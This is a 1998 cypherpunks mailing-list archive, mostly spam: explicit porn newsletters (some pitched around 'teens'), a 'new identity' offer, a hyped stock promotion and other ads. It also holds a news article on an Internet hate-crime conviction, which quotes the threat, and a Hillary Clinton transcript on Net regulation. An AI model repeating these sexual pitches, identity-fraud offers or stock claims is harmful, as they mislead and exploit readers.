$25,000! ---> http://208.195.150.31/us/us_main.cgi/us_5267/A

HOORAY! THE ADULT SEARCH ENGINE
Now you can search for the sex sites you are looking for and
fast!  This new search engine is setting the standard others
will follow.  It offers pop-up search and detailed listings!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Three dicks -------------------> http://207.168.184.26/trip/

CHAT WITH OTHER READERS
Hey,  if you haven't checked out the Eureka! Chat sites yet,
you're  missing out  on some  great stuff.  Every day you'll
find hundreds of other readers just like you looking to chat
have fun and maybe a little 'cyber'. We know you'll love it!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

HOT LIVE PHONE SEX TO MAKE YOU CUM!
LD Call only! - Live Hot Girls!!!!----------->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

NEW! CENTERFOLD PIC OF THE DAY
Exclusive!  We proudly present  unpublished Pictures of your
favorite Centerfolds.  Featured This Week: Dec 80-PMOY Terri
Welles, Dec 89-Petra Verkaik, Sept 93-Carrie Westcott, Kerri
Kendall,  Rebecca Ferratti,  Lydia Schone and many more too!
---------------------------> http://www.gatefold.com/eureka/

AMATEUR SITE OF THE DAY
Claire:   Claire   and   her   husband   (Andy)   are   true
exhibitionists who love  to  show  off, especially together.
Claire keeps an erotic  diary  that  puts  most magazines to
shame. This is one hot couple, check them out and read about
all their dirty adventures.
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
StoriesAndPics.com: StoriesAndPics.com gives you the best of
both worlds. Visit the site Yahoo calls "The Ultimate Erotic
Stories Site" Over  50  categories  of  sex  stories and XXX
pics! ....................... http://www.storiesandpics.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Woah,  our Adult Star pics are getting hotter and hotter, so
make sure you stop by and check out today's - definitely not
to be missed! --------> http://www.xxxadultstars.com/eureka/

OTHER EUREKAS!
GAY EUREKA! ----------> http://eureka.abc-web.com/gayeureka/
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?100
Pic  2 --------------------------> http://137.39.63.229/?101
Pic  3 --------------------------> http://137.39.63.229/?102
Pic  4 --------------------------> http://137.39.63.229/?103
Pic  5 --------------------------> http://137.39.63.229/?104
Pic  6 --------------------------> http://137.39.63.229/?105
Pic  7 --------------------------> http://137.39.63.229/?106
Pic  8 --------------------------> http://137.39.63.229/?107
Pic  9 --------------------------> http://137.39.63.229/?108
Pic 10 --------------------------> http://137.39.63.229/?109

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: o0brainiac0o@hotmail.com
Date: Tue, 10 Feb 1998 17:21:50 -0800 (PST)
To: SykoTooT@aol.com
Subject: Great H/P/V/A Site...packed with useful filez. Check it out!
Message-ID: <14378813_56286280>
MIME-Version: 1.0
Content-Type: text/plain



Sup,
  I found this great H/P/V/A site that You gotta see.  Its packed with tonz of useful texts and programs...it's worth the visit.


       http://www.ndi.net/~toot/

and please dont ferget to visit his sponsors since he is presently making only half as much as he needs to keep the site up and running.


      http://www.ndi.net/~toot/cash/


                                   o0brainiac0o




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: majordomo@bulkemailserver.com
Date: Wed, 11 Feb 1998 01:08:55 -0800 (PST)
To: Friend@public.com
Subject: Please send information
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Please send us more information on your product, service, business and/or
money making opportunity.  We are always looking for more ways to make money
and looking for resources to refer to our customers.  You may send us your information
at insane.income2@mailexcite.com  Do not hit reply because we will not receive it.

Do you need a NEW IDENTITY/ NEW ID/ PRIVACY/ PROTECTION/ CREDIT?

If yes, send an email to our Auto Responder at newid-info@freeyellow.com
Within minutes you should automatically receive more detailed information.
There is no need to type a message to us because we will not see.
The auto responder is an automated service that is programmed to send 
what we have already entered.

Do to the HIGH DEMAND FOR THIS INFORMATION your email may
not go through.  If after 10 minutes you haven't received anything than
fax us at (209) 952-8555 and request the "NEW IDENTITY" information.

HURRY,  get the information NOW!  We have a time limited
SPECIAL OFFER.  The information says that special expires
on Feb. 16, 1998, but because of the holiday we have extended the
special 2 more days, until Feb. 18, 1998!

Thank you for your time.  Remember, please send us information
on your offer (please DO NOT fax it, email it only).

P.S.  If you want to find out how we got RICH from the internet
go to http://www.freeyellow.com/members2/insaneincome. 
FREE INFORMATION!  You may also email your request to
insane.income@mailexcite.com  Please state that you want
"FREE INFORMATION ON HOW TO GET RICH ON THE 
INTERNET" (Please DO NOT fax this request, email it only).

THANKS AGAIN!
financehelp@juno.com
financehelp@juno.com
financehelp@juno.com
financehelp@juno.com
financehelp@juno.com
insane.income@mailexcite.com
new.you@mailexcite.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sbcom@wainfleet.ids.on.ca
Date: Tue, 10 Feb 1998 20:47:12 -0800 (PST)
To: sbcom@wainfleet.ids.on.ca
Subject: RYNO Seminar -- 18 February
Message-ID: <199802110441.XAA11595@e-bizness.com>
MIME-Version: 1.0
Content-Type: text/plain


GETTING ELECTRONIC MEDICAL RECORDS INTO THE EXAM ROOM

You are cordially invited to join RYNO, 4MD, Citrix and Symbol Technologies
for a FREE seminar on a cost-effective method of getting electronic medical
records into the exam room.

At this half-day event you will hear several success stories on how other
Health Care Institutions have implemented this program and benefited from
innovative technology to increase profitability and efficiency.  If you are
interested in this technology, but cannot make it to the seminar, please
contact RYNO's Healthcare Vertical Manager, Veronica Henderson at
vhenderson@ryno.com or call her at 1-800-366-7966, xt 265 to learn more.

Date:          Wednesday, Feb. 18th, 1998
Time:          Registration & Breakfast 9:00am*
          Seminar: 9:30am
          Adjourn and Hosted Lunch: 12:00pm*
Location:      Marriott Hotel, Walnut Creek
          2355 North Main St.
                     Walnut Creek, CA 94596
          510-934-2000
RSVP:          707-746-6252 x262 or email - jramirez@ryno.com
          Please respond by February 13th

*Breakfast and  Lunch are complimentary

Please feel free to RSVP anyone else who may be interested in attending.
We look forward to seeing you there!

Joy Ramirez
RYNO
4271 Park Road
Benicia CA 94510
707-746-6252 x262
jramirez@ryno.com


SYMBOL TECHNOLOGIES AND 4MD CORPORATION:

Healthcare provider needs can finally be addressed electronically.  Symbol
Technologies and 4MD Corporation provide a complete point-of-care solution
for healthcare providers using a Winframe Server.  4MD Corporation has
developed a simple, yet powerful, browser-based, Clinical Decision Support
(CDS) application that runs on the Symbol wireless thin client over a
Citrix Winframe.  Healthcare providers can now pull up patient records,
review electronic medical records, lab reports, radiology reports and other
patient information as well as clinical guidelines all at a patient's
bedside, or in the exam room on a handheld, flatscreen, mobile thin client.

Symbol Technologies and 4MD Corporation solutions are designed for
high-performance data management, and for satisfying the unique demands of
healthcare applications where mobility, durability and ease of operations
are a must.

WINFRAME:

   Is the only software that allows you to access a single server with
   virtually any Windows application from across any type of network
   connection by any desktop without the software being installed on the
   desktop!
   Allows you to use existing hardware (old 386, 486 PC's) and still use
   advanced software applications, thus getting longer use out of the
   hardware and saving money.
   Gives IS departments more control and manageability over the network.
   Allows remote offices to access information easily from the main
   headquarters.
   Saves in maintenance costs.

WHY WINFRAME?

Today, more than ever, I/S professionals are pursuing cost-effective and
efficient solutions to enterprise-wide application deployment. Deploying
business-critical Windows-based application?s across the enterprise is a
monumental task for today?s I/S professionals. They?re faced with huge
obstacles including manageability requirements, multiple desktop computing
platforms, clogged networks on heavily trafficked LAN?s, inadequate
application performance for remote users, and poor security. And, if that?s
not enough, they?re expected to solve these problems faster, with fewer
people and a smaller budget!

RYNO:

RYNO is an award winning Bay Area VAR with top level expertise in both
networking and software development. We serve healthcare institutions from
building the network to developing the GroupWare applications that make a
network function efficiently as a whole.

RYNO?s mission is to provide our customers with increased profitability and
efficiency by providing superior technology solutions. RYNO in partnership
with Citrix Solutions is offering you a free seminar introducing WinFrame,
a new paradigm in information management systems!

DIRECTIONS TO WALNUT CREEK MARRIOTT:

DRIVING FROM SAN FRANCISCO: I-101 North - follow signs to Bay Bridge (right
lanes) to I-580 East.  One mile to Highway 24 Concord/Walnut Creek. Highway
24 East to I-680 North.  Continue I-680 North to North Main Street exit.
Turn left on North Main Street and right on Parkside Drive.  Hotel is
located on the corner of Parkside Drive and North Main Street.

DRIVING FROM OAKLAND: Follow signs to I-880 Freeway North (towards
Oakland). Take I-880 to I-980 - Walnut Creek.  This turns into Highway 24.
Drive East on Highway 24 (use left lanes) to I-680 Interchange.Drive North
to I-680 for 1.5 miles to North Main Street Exit. Turn left on North Main
Street and right on parkside Drive. Hotel is located on the corner of
Parkside Drive and North Main Street.

DRIVING FROM SACRAMENTO:  Follow the signs to I-680 South Concord and
Walnut Creek. Cross the Benicia Bridge and proceed to Walnut Creek, exiting
on North Main Street.  (Approx. 5 miles). Stay in the right lane and turn
right after
exiting North main. The hotel is one block East on the right side of the
street.

DRIVING FROM SAN JOSE:  Follow the signs to I-680. As you approach Walnut
Creek, stay to the right and exit at North Main Street. Turn left on North
Main Street and right on Parkside Drive.  Hotel is located on the corner of
Parkside Drive and North Main Street.


















///////////////////////////////////////////////////////////////////////////////
This Message was Composed using Extractor Pro Bulk E- Mail Software. If 
you wish to be removed from this advertiser's future mailings, please reply 
with the subject "Remove" and this software will automatically block you 
from their future mailings.
////////////////////////////////////////////////////////////////////////////////






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <search@peoplefinders.net>
Date: Wed, 11 Feb 1998 05:21:56 -0800 (PST)
To: <cynrcr@delphi.com>
Subject: GOOD NEWS ABOUT BAD ACCOUNTS
Message-ID: <1998Feb11.072343.S2501.23202   >
MIME-Version: 1.0
Content-Type: text/plain


For the last fourteen years, National Credit Systems, Inc. has been providing top flight debt collection services to over 9,000 businesses, institutions, and healthcare providers.

We charge only a low-flat fee (less than $20) per account, and all proceeds are forwarded to you directly -- not to your collections agency.

If you wish, we will report unpaid accounts to Experian (formerly TRW), TRANSUNION, and Equifax. There is no charge for this important service.

PLEASE LET US KNOW IF WE CAN BE OF SERVICE TO YOU.

Simply reply with the following instructions in the "Subject" field:

REMOVE  --  Please remove me from your mailing list.
EMAIL   --  Please email more information.
FAX     --  Please fax more information.
MAIL    --  Please snailmail more information.
CALL    --  Please have a representative call.

Indicate the best time to telephone and any necessary addresses and telephone/fax numbers in the text of your reply.

If you prefer you can always telephone us during normal business hours at (212) 213-3000 Ext 1467.

Thank you.



P.S. -- If you are not in need of our services at this time, please retain this message for future use or past it on to a friend. Thank you.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eureka@eureka.abc-web.com
Date: Wed, 11 Feb 1998 01:41:39 -0800 (PST)
To: All Eureka! Subscribers: ;
Subject: Eureka! Wed Feb 11 '98
Message-ID: <19980211081945.29762.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Wednesday's issue of Eureka!

HE GIRLS!
This site calls itself  "The original She-Male, slut wonder-
land",  and it's hard not to agree.  With multiple live she-
male slut video feeds. Huge numbers of amazing shemale pics,
extra  hot stories  and so much more,  you'll just love this
site. And what's more, we have arranged a special free trial
membership for all Eureka! subscribers.  So go check it out!
HeGirls ... http://207.33.10.198/cgi-bin/gate1/pbm/he_0024/0

COLLEGE NUDES GET NASTY
http://www.collegenudes.com/eureka.htm
BRAND NEW SITE!!!  Just opened.  The hottest AMATEUR TEENS
getting nasty.  Pics In All Categories, and tons of Porno
material.  Cum Back to School for The Hottest sex on the
Web.

LESBIANS
Free hot pix!  Wet pink pussy, models and young ones. Simple
interface, just text links to jpeg images.  Check out number
seven, she has a star trek style shaved pussy. It's a quickie!
Lesbians ........ http://207.30.50.221/lesbians/lesbian.html

SIR CUM A LOT
Not a bad website.  Stop on by and see the samples for this
paysite.  They are all quick and easy thumbnails.  Featuring
panty, pussy, teen, asian, big tits, blowjob and a lot more! 
Sir Cum A Lot .......... http://www.sircumalot.com/main.html

PAGINA DO ROSERA
We had to go around the world to find this one!  Easy text
links to huge super high resolution images of pussy and dick.
Double dicks in one mouth, and a wild shot of a large glass
electrical insulator up some womans vagina! You must see it!
pagina Do Rosera ........... http://www.gold.com.br/~rosera/

MICHELLE
Now I know why the Beatles sang about Michelle. This one very
sweet hot young amateur teen.  She is images of herself in
various states of dress including a cheerleading outfit, up
her skirt shots and a great bedroom image with some nipple
action showing.  Check this little lady out for certain!
Michelle .............. http://mhgnet.com/michelle/mich.html

READ THIS!! WIN $25,000 and a Fantasy Date - Click Here Now!
$25,000! ---> http://208.195.150.31/us/us_main.cgi/us_5267/A

HOORAY! THE ADULT SEARCH ENGINE
Now you can search for the sex sites you are looking for and
fast!  This new search engine is setting the standard others
will follow.  It offers pop-up search and detailed listings!
Hooray! -----------------> http://eureka.abc-web.com/hooray/

FREE STREAMING VIDEO
Please note that most of these feeds require a Netscape bro-
wser in order to successfully view them. Unfortunately Micr-
osoft's browser does not have all the features of Netscape's
yet.  However, many of the feeds use the RealPlayer and will
work in most browsers.  If you do not have Netscape and want
a free copy click here --> http://www.netscape.com/download/
Pregnant ----------------------> http://207.168.184.26/preg/

CHAT WITH OTHER READERS
Hey,  if you haven't checked out the Eureka! Chat sites yet,
you're  missing out  on some  great stuff.  Every day you'll
find hundreds of other readers just like you looking to chat
have fun and maybe a little 'cyber'. We know you'll love it!
Adult/Sex Chat -----------------> http://137.39.63.229/chat/
General/Fun Chat -------> http://137.39.63.229/chat/funchat/

HOT LIVE PHONE SEX TO MAKE YOU CUM!
LD Call only! - Live Hot Girls!!!!----------->1-664-410-3912
LIVE: 1-on-1, 2-on-1, Group, Dateline-------->1-800-644-8779
FREE: Live 1-on-1 (international call only)--->011-678-77416

NEW! CENTERFOLD PIC OF THE DAY
Exclusive!  We proudly present  unpublished Pictures of your
favorite Centerfolds.  Featured This Week: Dec 80-PMOY Terri
Welles, Dec 89-Petra Verkaik, Sept 93-Carrie Westcott, Kerri
Kendall,  Rebecca Ferratti,  Lydia Schone and many more too!
---------------------------> http://www.gatefold.com/eureka/

AMATEUR SITE OF THE DAY
Wendy: "A fine ass blonde co-ed  with perky tits" is how one
person describes this  beautiful  babe.  Her hobbies include
writing and drawing, this  talented  woman  is the girl next
door. She loves computers and  sex  (imagine that!) so visit
her and see if she will interface with your HARD drive.
---------------------------> http://amateurindex.com/eureka/

EROTIC STORY SITE OF THE DAY
TeenStories.com: Dozens of  steamy  sex  stories  about teen
sexual experiences! This site is as  hot as they come! Visit
TeenStories.com today! ......... http://www.teenstories.com/

DAILY CARTOON ----------> http://www.erosinorbit.com/eureka/

ADULT STAR PIC OF THE DAY
Woah,  our Adult Star pics are getting hotter and hotter, so
make sure you stop by and check out today's - definitely not
to be missed! --------> http://www.xxxadultstars.com/eureka/

OTHER EUREKAS!
GAY EUREKA! ----------> http://eureka.abc-web.com/gayeureka/
DEUTSCH ------> http://eureka.abc-web.com/eureka/deutsch.htm
ESPAOL ------> http://eureka.abc-web.com/eureka/espanol.htm
FRANAIS ----> http://eureka.abc-web.com/eureka/francais.htm
ITALIANO ----> http://eureka.abc-web.com/eureka/italiano.htm
PORTUGUESE > http://eureka.abc-web.com/eureka/portuguese.htm

TODAY'S FREE PIX
Pic  1 --------------------------> http://137.39.63.229/?110
Pic  2 --------------------------> http://137.39.63.229/?111
Pic  3 --------------------------> http://137.39.63.229/?112
Pic  4 --------------------------> http://137.39.63.229/?113
Pic  5 --------------------------> http://137.39.63.229/?114
Pic  6 --------------------------> http://137.39.63.229/?115
Pic  7 --------------------------> http://137.39.63.229/?116
Pic  8 --------------------------> http://137.39.63.229/?117
Pic  9 --------------------------> http://137.39.63.229/?118
Pic 10 --------------------------> http://137.39.63.229/?119

============================================================
TO UNSUBSCRIBE FROM THIS NEWSLETTER,  USE THE REPLY FUNCTION
IN YOUR EMAIL PROGRAM, AND SEND THIS EMAIL RIGHT BACK TO US.
============================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: spencer@datamerge.com (Spencer Kluesner)
Date: Wed, 11 Feb 1998 08:56:50 -0800 (PST)
To: cypherpunks@toad.com
Subject: PRESS RELEASE: VENTURE CAPITAL CD
Message-ID: <19980211155548197.AIY417@datamerge.com>
MIME-Version: 1.0
Content-Type: text/plain


_______________________________________________________________
HIGH TECH FINANCING

FOR IMMEDIATE RELEASE: 


DATAMERGE ANNOUNCES VENTURETRACK 2000 CD-ROM INFOBASE 

VENTURE CAPITAL INSIDERS "TELL ALL" DATABASE

Press Contact:
Peter  Masi
(303) 399-6031                      
MasiPR@aol.com
http://www.datamerge.com/venturetrack.html

DENVER  --  DataMerge, Inc., a Denver-based developer of software and
information for companies seeking financing, today announced the release
of VentureTrack 2000, a software package containing extensive profiles
and proprietary "insider" information on hundreds of venture capital
firms throughout North America.

The VentureTrack 2000 CD-ROM Infobase gives entrepreneurs and small
business owners "insider" information, education and advice critical to 
establishing business relationships with specific venture capitalists
and securing financing from them.  The software lets users find the
firms that optimally fit their needs by identifying links between their
company and the interests of the venture capitalists.

VentureTrack 2000's "Inside Track" section then instructs users on
custom tailoring their business plan and presentation to each venture
capital firm.  Specific questions, concerns and objections that a given
firm will likely raise and good responses for each are also provided to
VentureTrack 2000 users.  

Information contained in the profiles was gathered by finance savvy
investigative reporters who used techniques adapted from the
intelligence community.   The information is exclusive to VentureTrack
2000 and is not available in competing products.  It includes:

*Insight into the firm's most likely areas of interest;

*Personal/individual preferences of principals;

*Best methods of approach and specific things to say or not say to a
particular individual;

*Investment philosophies and strategies based on past experiences;

*Firm background, working atmosphere and relationships;

*Case studies of investments that best represent their investment
philosophy;

*Inside advice/scoop from companies each VC firm has previously
financed;

*Information from DataMerge's customer "grapevine"; 

*Key contacts by project type and procedure for internal review;

*Portfolio investment overview.
 
In addition to the eight- to 12-page profiles of each venture capital
firm, VentureTrack 2000 includes an on-line tutor and venture industry
knowledgebase called VentureAdvisor, which was developed with extensive 
input from venture capital principals.  The total package is designed to
give users proprietary "insider" information and insight into the
venture capital industry, which historically were closely guarded 
secrets of a few well-placed individuals.

In addition to small business people, DataMerge CEO Spencer Kluesner
says venture capital firms themselves have shown strong interest in 
VentureTrack 2000 because they want to gather competitive intelligence
on their rivals. 

VentureTrack 2000 supports Windows 95 and Windows NT.  The time-limited
introductory price is $495.  VentureTrack 2000 can be ordered by calling
(800) 580-1188.   

Privately-held DataMerge was founded in 1989 by Spencer Kluesner, a
former securities advisor who today serves as chief executive officer of
the 26-person company.  DataMerge's products are sold directly to
customers in the North America, Western Europe and Asia.  Additional
information can be obtained at DataMerge's website:  
http://www.datamerge.com/venturetrack.html

Additional  Information:

VentureTrack 2000 White Paper -  
http://www.datamerge.com/venture/capital/whitepaper.html
Sample VentureTrack Profile -  
http://www.datamerge.com/venture/page5.html
VentureTrack Brochure - http://www.datamerge.com/venture/page2.html


--30--





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Honig <honig@otc.net>
Date: Wed, 11 Feb 1998 11:33:46 -0800 (PST)
To: cypherpunks@toad.com
Subject: Anti-Asian E-Mail Was Hate Crime, Jury Finds
Message-ID: <3.0.5.32.19980211113458.007b6350@otc.net>
MIME-Version: 1.0
Content-Type: text/plain












http://www.latimes.com/HOME/NEWS/ORANGE/OCNEWS/t000013848.html
                                      


                                       Wednesday, February 11, 1998 

            Anti-Asian E-Mail Was Hate Crime, Jury Finds 
              Internet: Ex-UCI student Richard Machado is found to have
violated civil
            rights with threatening messages. 
            By DAVAN MAHARAJ, Times Staff Writer
             
                      SANTA ANA--In the nation's first successful
prosecution of
                      a hate crime on the Internet, an expelled university
student
                  was found guilty Tuesday of violating the civil rights of
Asian
                  students at UC Irvine by sending e-mail threats to kill
them if they
                  didn't leave the school. 
                       Prosecutors hailed the verdict in the retrial of
20-year-old
                  Richard J. Machado as a victory for federal authorities
seeking to
                  police the Internet to deter hatemongers and racist groups. 
                       "This verdict shows that high-tech hate is not going
to be
                  tolerated," said Assistant U.S. Atty. Michael J. Gennaco,
who
                  prosecuted the case. "A line does have to be drawn in the
world of
                  cyberspace. If you cross that line and threaten people,
you are
                  going to be subject to criminal penalties." 
                       The jury of eight women and four men deliberated for
less than a
                  day before finding Machado guilty of interfering with
students' rights
                  to attend a public university. Jurors deadlocked 9 to 3
in favor of
                  conviction on a second, identical count. 
                       Machado displayed no emotion when the verdict was read
                  Tuesday afternoon. His first trial ended in a mistrial in
November
                  with jurors deadlocked 9 to 3 in favor of acquittal. 
                       Because his conviction carries a maximum sentence of
one year
                  in prison and he has already served more time than that
in custody,
                  Machado could be set free as early as Friday, when he
appears for
                  sentencing before U.S. District Judge Alicemarie H.
Stotler. 
                       Gennaco, who heads the civil rights division of the
U.S.
                  attorney's office in Los Angeles, downplayed Machado's
sentence. 
                       "What we've taken from this case is a deterrent
value that
                  people can't get on the Internet and send threats to
folks," Gennaco
                  said. 
                       Gennaco hinted that prosecutors would now be more
likely to
                  step in and prosecute computer users who stalk or
threaten others
                  in cyberspace. 
                       "We have a number of ongoing investigations regarding
                  allegations of threats on the Internet," Gennaco said.
"Now we have
                  some guidance from 12 people that the government can step
in and
                  enforce laws on the Internet." 
                       Machado's trial--and retrial--had been seen as a
test case. 
                       To prosecute Machado, prosecutors turned to civil
rights laws
                  enacted in the 1960s that were designed to prevent
Southerners
                  from standing in the way of school desegregation. 
                       Machado violated students' civil rights, prosecutors
contended,
                  when he hunched over a computer in UCI's engineering
building on
                  Sept. 20, 1996, and sent an anonymous e-mail message to
about
                  60 mainly Asian students. 
                       The message, signed "Asian Hater," warned that all
Asians
                  should leave UC Irvine or the sender would "hunt all of
you down
                  and kill your stupid asses." 
                       "I personally will make it my [life's work] to find
and kill every
                  one of you personally. OK? That's how determined I am. Do
you
                  hear me?" 
                       Apparently thinking the first one didn't get
transmitted, Machado
                  sent the same message twice, and school officials quickly
traced the
                  messages to him after they received complaints. 
                       The e-mail incensed and upset some students,
especially those
                  of Asian descent, who constitute nearly half of UC
Irvine's 17,000
                  students, the highest percentage of any UC school. 
                       Several students testified that they were petrified
by the e-mail.
                  They armed themselves with pepper spray, refused to go
out alone
                  at night and became suspicious of strangers. 
                       The defense called other students who testified that
they became
                  angry over the message but later shrugged it off as a bad
joke. 
                       During the trial, defense lawyers depicted Machado as a
                  disturbed teenager who became distraught and flunked out
of UCI
                  after his eldest brother was murdered in Los Angeles. 
                       When he sent the threatening e-mail, Machado was no
longer a
                  UCI student, but he was too ashamed to tell his immigrant
parents,
                  according to Deputy Federal Public Defender Sylvia
                  Torres-Guillen. 
                       Machado testified at both trials that one of his
brothers would
                  drive him to UCI each day even after he had been
expelled. There,
                  he passed his days in the computer laboratory, sending and
                  receiving e-mail and surfing the Internet until it was
time to go home.

                       On the day he sent the e-mail, Machado testified, he
was bored
                  and wanted to start a "dialogue" with people who were
signed on to
                  the school's computer network. 
                       Some attorneys, including Machado's defense team,
questioned
                  whether charges should have been filed against the former
student. 
                       Torres-Guillen even called an expert witness in
Internet
                  etiquette, who described Machado's e-mail as "a classic
                  flame"--online lingo for an angry message that, while
annoying, is
                  not meant to be harmful. 
                       But Gennaco contended that Machado hated Asians because
                  they got better grades than he did. 
                       In his rebuttal case, the prosecutor called a
University of South
                  Carolina freshman and another computer user in Denver who
                  testified that Machado referred to Asians as "chinks"
when he
                  chatted with them in cyberspace. 
                       The witnesses contradicted Machado's testimony that
he never
                  used derogatory terms for Asians. 
                       Gennaco said prosecutors may suggest that Machado
attend a
                  racial awareness program as part of his sentence. 

                   Search the archives of the Los Angeles Times for similar
stories. You will
                  not be charged to look for stories, only to retrieve one. 

                  Copyright Los Angeles Times 
 PREV STORY

 NEXT STORY













------------------------------------------------------------
      David Honig                   Orbit Technology
     honig@otc.net                  Intaanetto Jigyoubu

		Lewinsky for President '2012




	















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jtsr-stock@jtsr-stock.com
Date: Wed, 18 Feb 1998 04:02:48 -0800 (PST)
To: Friend@public.com
Subject: HOT STOCK-Double Your Money By Easter!!
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


You have been carefully selected to receive the following as a person obviously interested 
in this subject based upon your previous internet postings, or visits to one of our affiliate web
sites.  If you have received this message in error, please accept our apology as a 
responsible e-mailer, and reply with the word REMOVE in the subject line. You will be 
automatically excluded from future e-mailings. Thank you for your consideration and help
in making the Internet spam-free. *****

Visit http://www.jtsr-stock.com or call 888-295-6365 For Complete 
Information.

Who said opportunity only knocks once. JT's Restaurant is about to be one
of the fastest growing Restaurant chains. Under valued stock situations
presently $2.25 per share. Analysts predict stock to go as high as $5.00 
by Easter and could go up to $10.00 by end of 1998. Stock symbol JTSR on 
NASDAQ.  If you had invested just $100.00 in 1955 in Mcdonalds, it would 
be worth over $100 million today.  $1000 would be worth over $1 billion.  
Here is another opportunity for you.  Look for some exciting news shortly 
to boost this stock!!

Visit us at http://www.jtsr-stock.com or call 1-888-295-6365.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mixmaster <mixmaster@remail.obscura.com>
Date: Wed, 11 Feb 1998 15:03:03 -0800 (PST)
To: cypherpunks@toad.com
Subject: Re: Anti-Asian E-Mail
Message-ID: <199802112253.OAA05499@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


"Gennaco said prosecutors may suggest that Machado attend 
a racial awareness program as part of his sentence."

Political re-education, anyone?

Take names, take names, take names.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 11 Feb 1998 14:55:35 -0800 (PST)
To: cypherpunks@toad.com
Subject: Transcript of Hillary Clinton's comments on Net-regulation
Message-ID: <Pine.GSO.3.95.980211145506.19600I-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Wed, 11 Feb 1998 14:54:55 -0800 (PST)
From: Declan McCullagh <declan@well.com>
To: politech@vorlon.mit.edu
Subject: Transcript of Mrs. Clinton's comments on Net-regulation

Here's what Hillary Clinton said this afternoon about regulation of the
Internet during an otherwise routine press conference in the Map Room
about the "Millenium Evenings." Tonight at 7 pm EST she and the president
will cybercast the first one from the east room of the White House. 

It's hardly surprising that our elected officials don't like the ability
of the Internet to provide everyone with a platform. Even Thomas Jefferson
kvetched about the excesses of the press of his day and in 1783 and 1788
endorsed laws that permitted government prosecutions of the press for
printing "false facts."

Though I somehow suspect that the first lady has recently been more
worried about media reporting facts that may turn out to be true...

-Declan

===

     Q I just wanted to ask you about something that Gregg said.
He's obviously an Internet enthusiast.  But when he talked about some
of the aspects of the system -- the fact that you could say something
and you can't take it back, how it's so available to everyone and
instantaneous, he's raised some issues that have been issues for us
in the last few weeks in our business.  And I wonder if you think
that this new media is necessarily an entirely good thing.  And also,
as somebody who has been through this crucible, in the next
millennium how would you like to see this new and ever more
interesting -- (laughter) -- handled of things like the issues like
the personal lives of public figures.

	MRS. CLINTON: Well, Kathy, I think that's one of these issues
that Dick was referring to, that we're going to have to really think
hard about.  And I think that every time technology makes an advance
-- when you move to the railroad, or you move to the cotton gin, or
you move to the automobile, or the airplane, and now certainly as you
move to the computer and increasing accessibility and instantaneous
information on the computer, we are all going to have to rethink how
we deal with this, because there are always competing values.
There's no free decision that I'm aware of anywhere in life, and
certainly with technology that's the case.

	As exciting as these new developments are -- and I think Gregg's
enthusiasm is shared broadly by Americans and people around the world
-- there are a number of serious issues without any kind of editing
function or gate-keeping function.  What does it mean to have the
right to defend your reputation, or to respond to what someone says?

	There used to be this old saying that the lie can be halfway
around the world before the truth gets its boots on.  Well, today,
the lie can be twice around the world before the truth gets out of
bed to find its boots.  I mean, it is just beyond imagination what
can be disseminated.  So I think we're going to have to really worry
about this, because it won't be just public elected officials.  We've
seen some cases where somebody who had a grudge against a girl's
mother because the family wouldn't let him date her put out on the
Internet that the family were child abusers.  Totally private people,
never stuck their toe in public life.  It can be done to anybody, and
it can get an audience, and it can create a falsehood about somebody.
And certainly it's multiplied many times over if you happen to be in
public life.

	I don't have any clue about what we're going to do legally,
regulatorily, technologically -- I don't have a clue.  But I do think
we always have to keep competing interests in balance.  I'm a big
pro-balance person.  That's why I love the founders -- checks and
balances; accountable power.  Anytime an individual or an institution
or an invention leaps so far out ahead of that balance and throws a
system, whatever it might be -- political, economic, technological --
out of balance, you've got a problem, because then it can lead to the
oppression people's rights, it can lead to the manipulation of
information, it can lead to all kinds of bad outcomes which we have
seen historically.  So we're going to have to deal with that.  And I
hope a lot of smart people are going to --

	Q Sounds like you favor regulation.

	MRS. CLINTON: Bill, I don't know what -- that's why I said I
don't know what I'm in favor of.  And I don't know enough to know
what to be in favor of, because I think it's one of those new issues
we've got to address.  We've got to see whether our existing laws
protect people's right of privacy, protect them against defamation.
And if they can, how do you do that when you can press a button and
you can't take it back.  So I think we have to tread carefully.

	Q -- one of the balances, though, in this new digital age is
that you can have direct communication.  You're celebrating that
